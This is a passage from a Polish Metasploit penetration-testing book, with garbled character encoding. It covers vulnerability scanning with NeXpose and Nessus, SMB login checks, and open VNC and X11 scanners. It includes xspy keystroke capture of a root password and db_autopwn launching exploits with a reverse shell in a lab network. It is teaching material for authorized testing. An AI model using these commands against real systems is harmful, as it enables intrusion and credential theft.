Przy zaadowanej wtyczce NeXpose przyjrzyj si� poleceniom zaadowanymkonkretnie dla tego skanera luk w zabezpieczeniach. W tym celu wprowad�komend� help. Na górze listy powiniene� teraz zobaczy� szereg nowych pole-ce� przeznaczonych specjalnie do uruchamiania NeXpose.
msf > help
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 75
Zanim uruchomisz swoje pierwsze skanowanie z poziomu msfconsole, mu-sisz po�czy� si� z instalacj� NeXpose. Wpisz polecenie nexpose_connect -h, abywy�wietli� informacje o sposobie nawi�zywania po�czenia. Dodaj swoj� nazw�u�ytkownika oraz haso i adres hosta. Zaakceptuj równie� ostrze�enie o certyfi-kacie SSL, dodaj�c argument ok na ko�cu wiersza:
msf > nexpose_connect -h[*] Usage:[*] nexpose_connect username:password@host[:port] <ssl-confirm>[*] -OR-[*] nexpose_connect username password host port <ssl-confirm>msf > nexpose_connect dookie:[email protected] ok[*] Connecting to NeXpose instance at 192.168.1.206:3780 with username �dookie...
Teraz, aby zainicjowa� skanowanie, wprowad� polecenie nexpose_scan i po-daj docelowy adres IP, tak jak zostao to pokazane poni�ej. W tym przykadzieskanujemy pojedynczy adres IP, ale mo�esz równie dobrze poda� jako argumentzakres hostów (192.168.1.1-254) lub podsie� w notacji CIDR (192.168.1.0/24).
msf > nexpose_scan 192.168.1.195[*] Scanning 1 addresses with template pentest-audit in sets of 32[*] Completed the scan of 1 addressesmsf >
Kiedy skanowanie NeXpose zostanie zako�czone, jego wyniki powinny zo-sta� zapisane w bazie danych, któr� utworzye� wcze�niej. Aby przejrze� te wy-niki, zastosuj polecenie db_hosts, tak jak pokazuje to kolejny listing. (W tymprzykadzie listing zosta skrócony poprzez zastosowanie filtrowania po kolum-nie adresu [ang. address]).
msf > db_hosts -c addressHosts=====address Svcs Vulns Workspace------- ---- ----- ---------192.168.1.195 8 7 defaultmsf >
Jak mo�esz zauwa�y�, NeXpose wykry 7 luk w zabezpieczeniach. Wpro-wad� polecenie db_vulns, aby wy�wietli� znalezione luki:
msf > db_vulns
76 R o z d z i a � 4
Chocia� to skanowanie wykryo znacznie mniej luk w zabezpieczeniach w sto-sunku do 268 znalezionych w poprzednim skanowaniu wykonanym poprzez in-terfejs WWW z podaniem po�wiadcze�, to i tak te informacje powinny by� wy-starczaj�ce do rozpocz�cia eksploatacji danego systemu.
Skanowanie za pomoc� aplikacji NessusSkaner luk w zabezpieczeniach Nessus, dostarczony przez Tenable Security(http://www.tenable.com/), jest jednym z najpopularniejszych. Wtyczka Nessusdo Metasploit umo�liwia Ci przeprowadzanie skanowania i pobieranie informacjize skanów Nessusa za pomoc� konsoli. Jednak w poni�szych przykadach b�dziemyimportowa� wyniki skanowania Nessusa niezale�nie. Korzystaj�c z Nessusa 4.4.1na licencji Home Feed1, uruchomimy skanowanie z po�wiadczeniami tego samegocelu, który wykorzystywali�my w poprzednich przykadach w tym rozdziale. Imwi�cej narz�dzi wykorzystasz do sprecyzowania przyszych ataków na wst�p-nych etapach testu penetracyjnego, tym lepiej.
Konfiguracja skanera NessusPo pobraniu i zainstalowaniu skanera Nessus otwórz przegl�dark� internetow�i wpisz w pasku adresowym https://<twój_adres_ip>:8834. Zaakceptuj certyfikati zaloguj si�, u�ywaj�c po�wiadcze�, które utworzye� w trakcie instalacji. Powinnowy�wietli� si� gówne okno aplikacji Nessus, pokazane na rysunku 4.11.
Rysunek 4.11. G�ówne okno skanera Nessus
1 Darmowa licencja dla u�ytkowników domowych — przyp. t�um.
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 77
Po zalogowaniu wy�wietlana jest sekcja Reports (raporty), w której powinnaznajdowa� si� lista wszystkich poprzednio przeprowadzonych skanowa� lukw zabezpieczeniach. Na znajduj�cym si� na samej górze gównym pasku narz�dzidost�pne s� jeszcze zakadki: Scans (skanowania — su�y do tworzenia i prze-gl�dania zada� zwi�zanych ze skanowaniem), Policies (polityki — konfigurowa-nie ró�nych wtyczek stosowanych podczas skanowania) oraz Users (u�ytkownicy— dodawanie kont u�ytkowników do serwera Nessus).
Tworzenie polityki skanowania NessusaZanim rozpoczniesz skanowanie, musisz najpierw stworzy� polityk� skanowania(ang. scan policy) Nessusa. W zakadce Policies kliknij zielony przycisk Add, abyotworzy� okno konfiguracji polityki, pokazane na rysunku 4.12.
Rysunek 4.12. Okno konfiguracji polityki skanowania Nessusa
W tym oknie mo�esz zobaczy� wiele dost�pnych opcji. Wszystkie one zo-stay opisane w dokumentacji Nessusa.
1. Wpisz nazw� skanowania, tak jak pokazuje to rysunek 4.13. U�yta w naszymprzykadzie nazwa The_Works b�dzie okre�laa polityk� wykorzystywaniaprzez skaner Nessus wszystkich paszczyzn kontroli. Kliknij Next.
2. Podobnie jak w przeprowadzanym poprzednio skanowaniu za pomoc�aplikacji NeXpose, skonfigurujemy wykorzystanie po�wiadcze� (ang.credentials) logowania systemu Windows. Zapewni to bardziej kompletnyobraz luk w zabezpieczeniach, obecnych w docelowym systemie.Wpisz po�wiadczenia logowania systemu docelowego i kliknij Next.
78 R o z d z i a � 4
Rysunek 4.13. Zak�adka General — ogólna konfiguracja polityki
3. W zakadce Plugins (wtyczki) masz do wyboru szereg ró�nych wtyczekskanera Nessus dla systemów Windows, Linux, BSD i innych. Je�liprzykadowo wiesz, �e b�dziesz przeprowadza skanowanie jedyniesystemów Windows, to mo�esz dla pierwszego przebiegu skanowaniausun�� z listy wiele niepotrzebnych wtyczek. Dla celów naszego skanowaniawybierzemy wszystkie wtyczki, klikaj�c Enable All (na rysunku 4.14w lewym dolnym rogu). Teraz kliknij Next.
Rysunek 4.14. Zak�adka Plugins — wybór wtyczek Nessusa wykorzystywanychpodczas skanowania
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 79
4. Ko�cowym etapem definiowania nowej polityki jest zakadka Preferences(preferencje). Mo�esz tutaj skonfigurowa� pomijanie skanowania urz�dze�wra�liwych, takich jak drukarki sieciowe, skonfigurowa� zapisywaniewyników do zewn�trznej bazy danych, poda� po�wiadczenia logowaniai wiele innych rzeczy. Kiedy zako�czysz konfigurowanie tej zakadki,kliknij Submit, aby zapisa� nowo utworzon� polityk�. Polityka ta powinnapojawi� si� na li�cie w zakadce Policies, tak jak pokazuje to rysunek 4.15.
Rysunek 4.15. Nowo dodana polityka skanera Nessus
Uruchamianie skanowania za pomoc� NessusaJe�li utworzye� ju� polityk� skanowania, mo�esz rozpocz�� konfiguracj� kon-kretnego skanowania. Wybierz zakadk� Scans i kliknij przycisk Add, abyotworzy� okno konfiguracji. Wi�ksza cz��� konfiguracji Nessusa zawarta jestw politykach skanowania, wi�c kiedy definiujesz skanowanie, to wprowadzaszjego nazw�, wybierasz odpowiedni� polityk� oraz okre�lasz cele. Pokazuje torysunek 4.16.
Rysunek 4.16. Konfigurowanie skanowania Nessusa
80 R o z d z i a � 4
W naszym przykadzie skanujemy tylko jednego hosta, ale mo�esz równiedobrze wprowadzi� zakres adresów IP w notacji CIDR lub te� zaadowa� plikzawieraj�cy adresy IP celów, które chcesz przeskanowa�. Kiedy zako�czyszkonfiguracj�, kliknij Launch Scan (uruchom skanowanie).
Raporty skanera NessusPo zako�czeniu skanowania nie b�dzie ono ju� widoczne w zakadce Scans, zato w zakadce Reports pojawi si� nowy wpis zawieraj�cy nazw� skanowania, jegostatus oraz ostatni� aktualizacj�. Zaznacz wybrany raport i kliknij Browse, abyotworzy� podsumowanie skanowania pokazuj�ce poziomy dotkliwo�ci znalezio-nych luk w zabezpieczeniach. Przedstawia to rysunek 4.17.
Rysunek 4.17. Podsumowanie raportu z naszego skanowania za pomoc� Nessusa
UWAGA Pami�taj, �e to skanowanie by�o przeprowadzone z podaniem po�wiadcze sys-temu Windows, wi�c Nessus znalaz� du�o wi�cej luk w zabezpieczeniach, ni�mia�oby to miejsce w przypadku anonimowego skanowania.
Importowanie wyników do Metasploit FrameworkZaimportujmy teraz wyniki naszego skanowania do Metasploit Framework.
1. Kliknij przycisk Download Report w zakadce Reports, aby zapisa� wynikina dysk twardy. Domy�lny format raportów skanera Nessus, czyli .nessus,mo�e by� przetwarzany przez Metasploit. Je�li wi�c zostaniesz poproszonyo wybór domy�lnego formatu, kliknij Submit, aby zatwierdzi�.
2. Zaaduj msfconsole, utwórz now� baz� danych za pomoc� poleceniadb_connect i zaimportuj plik wyników Nessusa, wpisuj�c poleceniedb_import z podaniem nazwy pliku raportu.
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 81
msf > db_connect postgres:[email protected]/msf3msf > db_import /tmp/nessus_report_Host_195.nessus[*] Importing 'Nessus XML (v2)' data[*] Importing host 192.168.1.195
3. Aby zweryfikowa�, czy przeskanowany host oraz dane dotycz�ce lukw zabezpieczeniach zostay zaimportowane poprawnie, zastosuj poleceniedb_hosts, tak jak pokazuje to kolejny listing. Listing ten powinien zawiera�zwi�ze informacje na temat adresu IP celu (kolumna address), liczbywykrytych usug (kolumna svcs) oraz liczby wykrytych przez skanerNessus luk w zabezpieczeniach (kolumna vulns).
msf > db_hosts -c address,svcs,vulns
Hosts=====address svcs vulns------- ---- -----192.168.1.195 18 345
4. Je�li chcesz uzyska� pen� list� zawieraj�c� dane dotycz�ce lukw zabezpieczeniach, zaimportowane do Metasploit, zastosuj poleceniedb_vulns bez podawania �adnych argumentów. Przedstawia to poni�szylisting.
msf > db_vulns[*] Time: Wed Mar 09 03:40:10 UTC 2011 Vuln: host=192.168.1.195name=NSS-10916 refs=OSVDB-755[*] Time: Wed Mar 09 03:40:10 UTC 2011 Vuln: host=192.168.1.195name=NSS-10915 refs=OSVDB-754[*] Time: Wed Mar 09 03:40:11 UTC 2011 Vuln: host=192.168.1.195name=NSS-10913 refs=OSVDB-752[*] Time: Wed Mar 09 03:40:12 UTC 2011 Vuln: host=192.168.1.195name=NSS-10114 refs=CVE-1999-0524,OSVDB-94,CWE-200[*] Time: Wed Mar 09 03:40:13 UTC 2011 Vuln: host=192.168.1.195name=NSS-11197 refs=CVE-2003-0001,BID-6535
Posiadanie dost�pu do tych referencji na ko�cowym etapie testu penetra-cyjnego mo�e by� bardzo pomocne w przygotowywaniu raportu dla klienta.
Skanowanie za pomoc� Nessusa z poziomu MetasploitJe�li nie masz ochoty porzuca� wygody korzystania z wiersza polece� na rzeczinterfejsu graficznego, to mo�esz skorzysta� w Metasploit z wtyczki NessusBridge (http://blog.zate.org/nessus-plugin-dev/) dostarczonej przez Zate. Wtyczka
82 R o z d z i a � 4
Nessus Bridge umo�liwia cakowit� kontrol� Nessusa z poziomu Metasploit,uruchamianie skanowania, interpretacj� wyników oraz uruchamianie ataków napodstawie luk w zabezpieczeniach wykrytych przez Nessusa.
1. Podobnie jak w poprzednich przykadach, usu� najpierw istniej�c� baz�danych za pomoc� polecenia db_destroy i utwórz now� baz�, stosuj�cpolecenie db_connect.
2. Zaaduj wtyczk� Nessus, wpisuj�c polecenie load nessus, tak jak zostaoto pokazane poni�ej.
msf > db_destroy postgres:[email protected]/msf3[*] Warning: You will need to enter the password at the prompts belowPassword:
msf > db_connect postgres:[email protected]/msf3msf > load nessus[*] Nessus Bridge for Metasploit 1.1[+] Type nessus_help for a command listing[+] Exploit Index - (/root/.msf3/nessus_index) - is valid.[*] Successfully loaded plugin: Nessus
3. Wpisuj�c polecenie nessus_help, uzyskasz list� wszystkich komendobsugiwanych przez t� wtyczk�. Nessus Bridge jest stale rozwijanyi aktualizowany, warto wi�c od czasu do czasu sprawdzi�, czy zostaydodane jakie� nowe funkcje.
4. Zanim rozpoczniesz skanowanie za pomoc� wtyczki Nessus Bridge,musisz najpierw uwierzytelni� si� na serwerze Nessusa za pomoc�polecenia nessus_connect. Przedstawia to poni�szy listing.
msf > nessus_connect dookie:[email protected]:8834 ok[*] Connecting to https://192.168.1.101:8834/ as dookie[*] Authenticated
5. Podobnie jak w przypadku graficznego interfejsu Nessusa, skanowanienale�y zainicjowa� z wykorzystaniem zdefiniowanej polityki okre�lonejnumerem ID. Aby wy�wietli� list� dost�pnych na serwerze politykskanowania, zastosuj polecenie nessus_policy_list:
msf > nessus_policy_list[+] Nessus Policy List
ID Name Comments-- ---- ---------4 Internal Network Scan
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 83
-3 Web App Tests-2 Prepare for PCI DSS audits-1 External Network Scan2 The_Works
6. Wybierz ID polityki, któr� chcesz zastosowa� do skanowania, i uruchomnowe skanowanie za pomoc� polecenia nessus_scan_new, podaj�c numerpolityki, nazw� skanowania oraz docelowy adres IP. Przedstawia toponi�szy listing.
msf > nessus_scan_new[*] Usage:
[*] nessus_scan_new <policy id> <scan name> <targets>[*] use nessus_policy_list to list all available policiesmsf > nessus_scan_new 2 bridge_scan 192.168.1.195[*] Creating scan from policy number 2, called "bridge_scan" and scanning �192.168.1.195[*] Scan started. uid is d2f1fc02-3b50-4e4e-ab8f- �38b0813dd96abaeab61f312aa81e
7. Podczas wykonywania skanowania mo�esz sprawdzi� jego statusza pomoc� polecenia nessus_scan_status. Je�li polecenie zwróci statusNo Scans Running (nie jest wykonywane �adne skanowanie), tak jakpokazuje to kolejny przykad, to skanowanie zostao zako�czone.
msf > nessus_scan_status[*] No Scans Running.
8. Po zako�czeniu skanowania mo�esz wy�wietli� list� dost�pnych raportówza pomoc� polecenia nessus_report_list. Znajd� ID raportu, który chceszzaimportowa�, a nast�pnie u�yj polecenia nessus_report_get, aby pobra�i automatycznie zaimportowa� wybrany raport do bazy danych Metasploit.
msf > nessus_report_list[+] Nessus Report List
ID Name Status Date-- ---- ------ ----074dc984-05f1-57b1-f0c9-2bb80ada82fd3758887a05631c1d Host_195 completed 19:43�Mar 08 2011d2f1fc02-3b50-4e4e-ab8f-38b0813dd96abaeab61f312aa81e bridge_scan completed 09:37�Mar 09 2011
84 R o z d z i a � 4
[*] You can:[*] Get a list of hosts from the report: nessus_report_hosts <report id>msf > nessus_report_get d2f1fc02-3b50-4e4e-ab8f-38b0813dd96abaeab61f312aa81e[*] importing d2f1fc02-3b50-4e4e-ab8f-38b0813dd96abaeab61f312aa81e[*] 192.168.1.195 Microsoft Windows XP Professional (English) Done![+] Done
9. Na koniec, podobnie jak w przypadku pozostaych funkcji importowaniaopisanych w tym rozdziale, mo�esz zastosowa� polecenie db_hosts, �ebyzweryfikowa�, czy dane dotycz�ce skanowania zostay poprawniezaimportowane:
msf > db_hosts -c address,svcs,vulns
Hosts=====address svcs vulns------- ---- -----192.168.1.195 18 345
Teraz, kiedy zapoznae� si� ju� ze zmienno�ci� wyników skanowania dwóchró�nych produktów, powiniene� lepiej zrozumie� sens stosowania wi�cej ni�jednego narz�dzia dla potrzeb skanowania luk w zabezpieczeniach. Wci�� jednakto od pentestera zale�y interpretacja wyników generowanych przez te zauto-matyzowane narz�dzia i przeksztacenie tych wyników w dane decyzyjne.
Wyspecjalizowane skanery lukw zabezpieczeniach
Chocia� na rynku dost�pnych jest wiele komercyjnych skanerów luk w zabez-pieczeniach, nie musisz si� do nich ogranicza�. Je�li chcesz wykona� skanowa-nie poprzez sie� w poszukiwaniu konkretnych luk w zabezpieczeniach, to mo-�esz skorzysta� z licznych moduów pomocniczych Metasploit.
Przedstawione poni�ej moduy Metasploit stanowi� tylko kilka przykadówspo�ród wielu u�ytecznych pomocniczych moduów skanowania za�czonychw tym frameworku. Wykorzystaj swoje laboratorium testowe do wypróbowaniai zbadania tak wielu z nich, jak to mo�liwe.
Potwierdzanie logowania SMBAby sprawdzi� poprawno�� kombinacji nazwy u�ytkownika i hasa, skorzystaj zeskanera SMB Login Check Scanner do po�czenia si� z wieloma hostami. Jakpewnie si� spodziewasz, takie skanowanie jest go�ne i zauwa�alne, a ka�da próbalogowania zostanie zapisana w dzienniku zdarze� ka�dej maszyny z systememWindows, która zostanie napotkana.
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 85
Po wybraniu moduu smb_login za pomoc� polecenia use mo�esz zastosowa�polecenie show_options, aby sprawdzi� ustawienia, które znajduj� si� w kolumnieRequired. Metasploit pozwala zdefiniowa� kombinacj� nazwy u�ytkownika i hasa,poda� list� nazw u�ytkownika i hase lub te� zastosowa� obie te opcje jednocze�nie.W kolejnym przykadzie zdefiniowano niewielki zakres adresów IP dla opcjiRHOSTS oraz skonfigurowano sprawdzanie okre�lonej nazwy u�ytkownika i hasadla wszystkich adresów.
msf > use auxiliary/scanner/smb/smb_loginmsf auxiliary(smb_login) > show options
Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no SMB Domain SMBPass password no SMB Password SMBUser Administrator no SMB Username THREADS 50 yes The number of concurrent threads USERPASS_FILE no File containing users and passwords separated �by space, one pair per line USER_FILE no File containing usernames, one per line
msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-155RHOSTS => 192.168.1.170-192.168.1.175msf auxiliary(smb_login) > set SMBUser AdministratorSMBUser => Administratormsf auxiliary(smb_login) > set SMBPass s3cr3tSMBPass => s3cr3tmsf auxiliary(smb_login) > run[*] Starting host 192.168.1.154[*] Starting host 192.168.1.150[*] Starting host 192.168.1.152[*] Starting host 192.168.1.151[*] Starting host 192.168.1.153[*] Starting host 192.168.1.155
� [+] 192.168.1.155 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'[*] Scanned 4 of 6 hosts (066% complete)[*] Scanned 5 of 6 hosts (083% complete)[*] Scanned 6 of 6 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(smb_login) >
W punkcie � mo�esz zobaczy� skuteczne logowanie dla u�ytkownika Admi-nistrator z hasem s3cr3t. Poniewa� w wielu �rodowiskach korporacyjnych sta-cje robocze s� klonowane z jednego obrazu i wdra�ane w caej infrastrukturzeprzedsi�biorstwa, haso administratora mo�e równie� by� takie samo dla ka�dejz nich, co daje Ci dost�p do wszystkich stacji roboczych w danej sieci.
86 R o z d z i a � 4
Skanowanie w poszukiwaniu otwartego uwierzytelniania VNCSystem przekazywania obrazu zwany VNC (ang. virtual network computing)umo�liwia graficzny dost�p do zdalnych systemów w sposób zbli�ony do pulpituzdalnego Microsoftu. Instalacje VNC s� powszechnie stosowane w korporacjach,poniewa� zapewniaj� podgl�d interfejsu graficznego pulpitów serwera i stacjiroboczych. Cz�sto instaluje si� VNC na potrzeb� chwili, a pó�niej zapomina si�o tej instalacji, pozostawiaj�c j� bez aktualizacji, co tworzy powa�n� potencjaln�luk� w zabezpieczeniach. Wbudowany w Metasploit skaner VNC AuthenticationNone przeszukuje zakres adresów IP w poszukiwaniu serwerów VNC, które nieposiadaj� skonfigurowanego hasa (brak uwierzytelniania, czyli puste haso). Zazwy-czaj takie skanowanie nie przynosi �adnych efektów, jednak dobry pentester wy-korzystuje wszystkie mo�liwo�ci uzyskania dost�pu do systemu docelowego.
UWAGA Najnowsze serwery VNC nie dopuszczaj� stosowania pustych hase�. Dla celówtestowych powiniene� wykorzysta� starsz� wersj�, na przyk�ad RealVNC 4.1.1.
Skaner VNC, tak jak wi�kszo�� moduów pomocniczych Metasploit, jest atwydo skonfigurowania i uruchomienia. Jedyna wymagana konfiguracja dla vnc_none_authto podanie adresu IP lub zakresu adresów IP, które maj� by� przeskanowane. Po pro-stu wybierz dany modu, okre�l w razie potrzeby opcje RHOSTS oraz THREADS i uru-chom skanowanie, tak jak pokazuje to kolejny przykad.
msf > use auxiliary/scanner/vnc/vnc_none_authmsf auxiliary(vnc_none_auth) > show options
Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 5900 yes The target port THREADS 1 yes The number of concurrent threads
msf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.155RHOSTS => 192.168.1.155msf auxiliary(vnc_none_auth) > run
[*] 192.168.1.155:5900, VNC server protocol version : RFB 003.008[*] 192.168.1.155:5900, VNC server security types supported : None
� [*] 192.168.1.155:5900, VNC server security types includes None, free access![*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(vnc_none_auth) >
Je�li b�dziesz mia szcz��cie i Metasploit znajdzie serwer VNC bez uwie-rzytelniania, taki jak ten w punkcie �, to mo�esz skorzysta� z narz�dzia vncviewersystemu Back|Track, aby po�czy� si� z docelow� maszyn� bez konieczno�cipodawania hasa. Pokazuje to rysunek 4.18.
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 87
Rysunek 4.18. Zastosowanie narz�dzia vncviewer do po��czenia si� z VNCniewymagaj�cym uwierzytelniania
Je�li uwa�asz, �e skanowanie VNC mo�e by� strat� czasu i nigdy nie znaj-dziesz systemów z otwartymi serwerami VNC, to powiniene� przemy�le� tojeszcze raz. Podczas szeroko zakrojonego testu penetracyjnego obejmuj�cegotysi�ce systemów jeden z autorów zauwa�y system z otwartym serwerem VNC.
B�d�c zalogowanym do tego systemu i dokumentuj�c swoje odkrycie, autorzauwa�y w pewnym momencie aktywno�� w tym systemie. Dziao si� to noc�,a dany system nie powinien by� wtedy wykorzystywany przez �adnego upraw-nionego u�ytkownika. Cho� nie jest to z reguy uwa�ane za dobr� praktyk�, au-tor podszy si� pod innego nieuprawnionego u�ytkownika i zainicjowa rozmow�,wykorzystuj�c do tego celu aplikacj� Notatnik. Intruz nie by zbyt bystry i wyjawiautorowi, �e skanowa du�e grupy systemów pod k�tem otwartych serwerów VNC.Oto fragment tej rozmowy (zachowano pisowni� oryginaln�):
Autor: Jeste� teraz w USA czy poza krajem? Mam znajomych w danii.
Intruz: Wa�ciwie to jestem z Norwegii, hehe. Mam krewnych w Danii.
Autor: Uczestniczysz w jakich� forach? korzystaem z kilku ale ju� nie dziaaj�
Intruz: Przewa�nie w programistycznych, ale niewiele poza tym. Od dawnazajmujesz si� hakowaniem? Ile masz lat tak w ogóle? Ja mam 22.
Autor: Robi� to dla zabawy tak mniej wi�cej od roku. Chodz� jeszcze doszkoy, mam 16 lat. Po prostu szukaem jakiego� zaj�cia.
Intruz: Ja te� gównie robi� to dla zabawy i próbuj� si� sprawdzi�. Poza tymsam napisaem taki program „VNC finder”. Znalazem mnóstwo serwerów,ale tylko ten dostarczy mi nieco rozrywki
Autor: Nie�le. W czym go napisae�? Mo�na go sk�d� pobra�? Masz uchwyt pliku?
Intruz: Napisaem go w j�zyku, który nazywa si� PureBasic, ale nie jest jeszczegotowy do publikacji. U�ywam go tylko na wasne potrzeby. Ale w sumie mog�go udost�pni�. Mógbym gdzie� zamie�ci� kod, �eby� go sobie skompilowa.Je�li tylko znajdziesz jaki� kompilator PureBasica na stronach warezowych :P
Autor: Super. Mo�esz go wrzuci� przez irc na t� stron� pastebin. Tak mo�eszposta opublikowa�. Nie robiem wcze�niej nic w purebasic, tylko python i perl
Intruz: Poszukam tej strony pastebin i zaaduje go, daj mi kilka minut. Odezw� si�.
Intruz poda w ko�cu autorowi link do strony pastebin z penym kodem�ródowym skanera VNC, którego u�ywa.
88 R o z d z i a � 4
Skanowanie w poszukiwaniu otwartych serwerów X11Zintegrowany z Metasploit skaner open_x11 jest zbli�ony do skanera vnc_auth.Przeszukuje on zakres hostów w poszukiwaniu serwerów X11, które umo�li-wiaj� u�ytkownikom �czenie si� bez uwierzytelniania. Chocia� serwery X11 nies� ju� dzisiaj powszechnie wykorzystywane, to znajdzie si� wiele dziaaj�cycharchaicznych maszyn posiadaj�cych stare, niezaatane i zapomniane systemyoperacyjne. Jak moge� zauwa�y� w poprzednich dwóch przykadach, starszesystemy s� cz�sto najbardziej zagro�one w ka�dej sieci.
Aby uruchomi� skaner open_x11, musisz wykona� podobn� konfiguracj� jakw przypadku wi�kszo�ci pozostaych moduów pomocniczych, definiuj�c warto��RHOST oraz opcjonalnie THREADS. Kolejny przykad ilustruje sesj� tego skanera.Zwró� uwag�, �e skaner znalaz otwarty serwer X pod adresem IP 192.168.1.23.Jest to powa�na luka w zabezpieczeniach, poniewa� umo�liwia osobie przepro-wadzaj�cej atak uzyskanie nieuwierzytelnionego dost�pu do danego systemu:system X obsuguje interfejs graficzny wraz z myszk� i klawiatur�.
msf > use auxiliary/scanner/x11/open_x11msf auxiliary(open_x11) > show options
Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 6000 yes The target port THREADS 1 yes The number of concurrent threads
msf auxiliary(open_x11) > set RHOSTS 192.168.1.0/24RHOSTS => 192.168.1.0/24msf auxiliary(open_x11) > set THREADS 50THREADS => 50msf auxiliary(open_x11) > run[*] Trying 192.168.1.1[*] Trying 192.168.1.0[*] Trying 192.168.1.2...[*] Trying 192.168.1.29[*] Trying 192.168.1.30[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)[*] Trying 192.168.1.31[*] Trying 192.168.1.32
. . . fragment usuni�ty . . .
[*] Trying 192.168.1.253[*] Trying 192.168.1.254[*] Trying 192.168.1.255[*] Auxiliary module execution completed
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 89
�eby zobaczy�, co osoba atakuj�ca mo�e zrobi� z tak� luk� w zabezpiecze-niach, uruchom rejestrowanie klawiatury, wykorzystuj�c narz�dzie xspy systemuBack|Track. Robi si� to w nast�puj�cy sposób:
root@bt:/# cd /pentest/sniffers/xspy/root@bt:/pentest/sniffers/xspy# ./xspy -display 192.168.1.23:0 -delay 100
ssh [email protected](+BackSpace)37sup3rs3cr3tp4s5w0rdifconfigexit
Narz�dzie xspy dzi�ki zdalnemu podsuchiwaniu sesji klawiatury serwera Xumo�liwio przechwycenie u�ytkownika wykorzystuj�cego SSH do zalogowaniasi� jako root na zdalnym systemie. Tego typu luki w zabezpieczeniach mog� by�do�� rzadkie, jednak je�li ju� je odkryjesz, s� niezwykle cenne.
Wykorzystywanie wyników skanowaniado autopwningu
Przejd�my teraz na chwil� do eksploatacji. Narz�dzie Autopwn frameworkuMetasploit automatycznie namierza i eksploatuje system, wykorzystuj�c otwarteporty lub zaimportowane wyniki skanowania luk w zabezpieczeniach. Mo�eszzastosowa� Autopwn do wykorzystania wyników wi�kszo�ci skanerów luk w za-bezpieczeniach, takich jak NeXpose, Nessus czy OpenVAS.
Oto przykad wykorzystania zaimportowanych wyników Nessusa do namie-rzenia i automatycznego przej�cia (ang. autopwn) systemu. Utwórz now� baz�danych za pomoc� polecenia db_connect, a nast�pnie zaimportuj raport ze ska-nowania, stosuj�c polecenie db_import. W tym przykadzie uruchomimydb_autopwn z szeregiem prze�czników, aby przeprowadzi� ataki na wszystkiecele (e), pokaza� wszystkie pasuj�ce moduy (t), zastosowa� adunek reverseshell (r), wybra� moduy exploitów na podstawie luk w zabezpieczeniach (x)oraz na podstawie otwartych portów (p). Po uruchomieniu db_autopwn Meta-sploit rozpoczyna odpalanie exploitów do okre�lonych celów. Je�li dziaanieexploita przyniesie skutek, to zwracana jest powoka do maszyny atakuj�cej.
msf > db_connect postgres:[email protected]/msf3msf > db_import /root/nessus.nbemsf > db_autopwn –e –t –r -x -p
� [*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin �against 192.168.33.130:1433...
90 R o z d z i a � 4
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against �192.168.33.130:445...[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against �192.168.33.130:445...
. . . fragment usuni�ty . . .
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (718336 bytes)
� [*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...
Na podstawie tych skanowa� Autopwn odpali 72 exploity w punkcie �.Jeden z nich okaza si� skuteczny, co wida� w punkcie �. Exploit ten umo�liwiapeny dost�p do danej maszyny z wykorzystaniem konsoli Meterpretera, którazostanie bardziej szczegóowo omówiona w rozdziale 6.
UWAGA Istnieje jedno istotne ograniczenie, o którym powiniene� pami�ta�, stosuj�c na-rz�dzie Autopwn. Je�li przeprowadzasz zmasowany atak za pomoc� Autopwn, tosystem docelowy mo�e ulec awarii lub utraci� stabilno��. Autopwn posiada jed-nak kilka u�ytecznych funkcji, które nie zosta�y tutaj opisane. Nale�y do nichmo�liwo�� wyboru jedynie tych exploitów, które posiadaj� ranking „doskona�y”,co znacznie zmniejsza prawdopodobiestwo, �e spowoduj� one awari� zdalnegosystemu lub us�ugi. Aby uzyska� wi�cej informacji na temat wykorzystania tegonarz�dzia, u�yj polecenia db_autopwn –h.
Skorowidz
Aaccess point, 208administrator przedsi�biorstwa,
28adres zwrotny, return address,
255, 261adresy prywatne, 55aktualizacja systemu
Back|Track, 339algorytm Blowfish, 207analiza
luk w zabezpieczeniach, 27�ledcza, 327
anonimowe logowanie, 60aplet Javy, 187aplikacja
Ettercap, 223MailCarrier, 277NetWin SurgeMail, 251Quick TFTP, 287
aplikacje podatne na ataki, 336architektura CPU, 278armitage, 38asembler, 40, 272
atakbrute force, 113, 178client-side, 151, 163, 209,
222cross-site scripting, 196DNS, 45man-left-in-the-middle, 196mass mailingowy, 195na adres e-mail, 185na fikcyjn� stron�, 188na MS SQL Server, 113na serwer Apache Tomcat,
323na stert�, 106, 130pass-the-hash, 132r�czny, 316spear-phishing, 182�lepy, 219Web Jacking, 197wieloaspektowy, 199wstrzykni�cia zapytania, 29wykorzystuj�cy
aplet Javy, 181, 187, 203a�cuch zapytania, 211parametr POST, 212
przepenienie bufora, 250t�czowe tablice, 121
z pivotingiem, 130zatrucia ARP, 223zwi�kszaj�cy uprawnienia,
153zwracaj�cy b�dy, 219
atakiSET, 208socjotechniczne, 208
atakowanienietypowych usug, 326sieci bezprzewodowych, 236
automatyczna migracja procesu,161
